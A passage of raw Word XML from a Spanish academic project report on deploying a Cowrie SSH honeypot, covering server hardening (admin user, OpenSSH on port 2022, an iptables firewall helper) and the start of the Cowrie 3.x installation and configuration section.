            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1450"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">01_hardening.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Usuario administrador, actualizaciones, swap, firewall iptables y SSH real en el puerto 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hay una clave autorizada; el 2022 está abierto en el firewall del proveedor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1450"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">02_instalar_cowrie.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Usuario cowrie, Cowrie 3.1.0, configuración, servicios systemd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">userdb.txt es ASCII puro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1450"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">03_redireccion_22.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Redirección NAT 22 → 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sshd escucha en 2022 y Cowrie está activo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 6. Scripts de despliegue y comprobaciones de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos los scripts son idempotentes: antes de crear una regla de firewall comprueban si ya existe (iptables -C), y antes de inicializar Cowrie comprueban si ya hay configuración. Así pueden volver a ejecutarse tras un fallo parcial sin duplicar reglas ni sobrescribir cambios. Además, se ejecutan con set -euo pipefail, de modo que cualquier orden que falle detiene el script en lugar de continuar con un estado inconsistente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bastionado del Servidor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script 01_hardening.sh aplica el bastionado básico del sistema. Comienza actualizando los paquetes y activando unattended-upgrades para que los parches de seguridad se instalen automáticamente durante las semanas de exposición. Si la máquina tiene menos de 2 GB de RAM, crea además un fichero de swap de 2 GB, previsto para el caso de que hubiera que recurrir a una instancia pequeña.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Usuario Administrador</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Como el script prohíbe el acceso SSH como root, antes debe existir un usuario administrador con una clave autorizada; de lo contrario, el administrador se quedaría fuera del servidor. Oracle y AWS entregan sus máquinas con un usuario ubuntu, pero Hetzner solo permite entrar como root. El script detecta el caso: si se ejecuta con sudo usa el usuario que lo invoca; si existe ubuntu con clave, usa ese; y si solo hay root, crea un usuario nuevo (diego en este proyecto), le copia la clave autorizada de root con los permisos correctos (700 para el directorio .ssh y 600 para el fichero), lo añade al grupo sudo y le pide una contraseña que solo se usará para sudo, ya que el acceso SSH sigue siendo exclusivamente por clave. Para poder relanzar el script tras un fallo, la contraseña solo se solicita si el usuario aún no tiene una.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuración de OpenSSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La configuración del SSH real no se aplica editando /etc/ssh/sshd_config, sino mediante un fichero independiente en el directorio /etc/ssh/sshd_config.d/. Esta decisión responde a dos particularidades de OpenSSH que se detectaron durante el diseño:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gana el primer valor, no el último: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">para la mayoría de opciones, sshd usa la primera aparición que encuentra. Las imágenes cloud de Ubuntu incluyen ficheros como 50-cloud-init.conf en ese directorio, así que el fichero del proyecto se nombra 00-pfc-hardening.conf para leerse antes que todos ellos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La opción Port se acumula: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a diferencia del resto, cada línea Port añade un puerto de escucha. Si sshd_config conserva un «Port 22», el SSH real seguiría escuchando en el 22 y la redirección posterior entraría en conflicto. El script comenta cualquier línea Port del fichero principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El fichero establece el puerto 2022, la autenticación exclusiva por clave pública (AuthenticationMethods publickey), la prohibición del acceso como root, la restricción a un único usuario administrador (AllowUsers) y límites de tres intentos y 30 segundos para autenticarse. Antes de reiniciar el servicio se valida la sintaxis con sshd -t; si falla, el script elimina el fichero y se detiene sin tocar el servicio en ejecución. Esta validación necesita que exista el directorio /run/sshd, que en Ubuntu 24.04 solo se crea mientras el servicio está en marcha; por eso el script lo crea antes de validar (véase la incidencia correspondiente en el capítulo de Pruebas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 24.04 introduce otra particularidad: el SSH se arranca por activación de socket (ssh.socket) y es systemd, no sshd, quien abre el puerto de escucha. Por eso, tras cambiar el puerto no basta con reiniciar ssh.service; hay que recargar la configuración de systemd y reiniciar ssh.socket. El script hace ambas cosas y después comprueba con ss que hay un proceso escuchando en el 2022. Si no lo hay, se detiene y avisa de no cerrar la sesión actual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall con iptables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script detecta si la cadena INPUT ya termina en una regla de rechazo, como ocurre en las imágenes de Oracle. Si no es así, como en Hetzner, construye la base de una política restrictiva: aceptar el tráfico de conexiones establecidas, la interfaz de loopback, ICMP y el puerto 22, y rechazar todo lo demás. Sobre esa base inserta la regla que abre el 2022 y guarda el conjunto con netfilter-persistent. El puerto 22 se mantiene abierto en este paso porque la sesión del administrador sigue entrando por él hasta que se complete el despliegue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="120" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure() {  # inserta la regla al principio solo si no existe ya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  local chain=$1; shift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -C "$chain" "$@" 2&gt;/dev/null || iptables -I "$chain" 1 "$@"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure INPUT -p tcp --dport "$SSH_PORT" -m conntrack --ctstate NEW -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">netfilter-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Instalación y Configuración de Cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modelo de Instalación de Cowrie 3.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante la preparación del proyecto se comprobó que Cowrie cambió su modelo de instalación a partir de la versión 3.0. Las versiones anteriores se instalaban clonando el repositorio y ejecutando bin/cowrie desde el propio código fuente, que es lo que describe la mayoría de tutoriales disponibles. Desde la versión 3 se instala como un paquete de Python (pip install cowrie) y se inicializa un directorio de estado con cowrie init, que crea la configuración en etc/ y las carpetas de logs, descargas y claves en var/. El proyecto fija la versión 3.1.0 para que el despliegue sea reproducible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie se ejecuta con un usuario dedicado sin privilegios (cowrie) y dentro de un entorno virtual de Python, de forma que sus dependencias no interfieren con las del sistema. El propio Cowrie se niega a arrancar como root, una medida de seguridad coherente con su función: es un programa expuesto deliberadamente a atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuración por Capas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie 3 carga primero sus valores por defecto y después el fichero etc/cowrie.cfg, que solo necesita contener las claves que se quieren cambiar. El fichero del proyecto (Anexo A) modifica los siguientes aspectos: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588"/>
        <w:gridCol w:w="2064"/>
        <w:gridCol w:w="2064"/>
        <w:gridCol w:w="2223"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Opción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Valor por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Valor del proyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
